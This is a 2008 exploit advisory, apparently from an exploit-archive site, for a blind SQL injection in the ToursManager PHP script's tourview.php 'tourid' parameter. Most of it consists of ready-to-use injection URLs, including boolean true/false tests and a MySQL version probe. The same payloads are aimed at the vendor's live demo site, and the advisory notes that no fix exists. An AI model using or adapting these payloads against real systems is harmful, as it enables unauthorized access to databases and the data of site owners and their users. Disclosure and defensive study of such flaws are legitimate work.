ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability

2008-11-20 15:47:14

[>] Name:--> ToursManager PhP Script <= Blind Sql Injection

[>] Discovered by:--> XaDoS

[>] ContacT m&:--> xados[at]hotmail.it

[>] Site:--> http://www.toursmanager.com

#########

[■] £XpLoIT:

|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)

|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)

Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)

V=> 5.x.x XD

#########
[■] D&M0:

|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--

|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--

|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5

#########

[■] Th4Nks T0:

\> Boom3rang </ (very kind) ;-)
\> Langy </
\> Str0ke </

#########

#

Fixes

No fixes

In order to submit a new fix you need to be registered.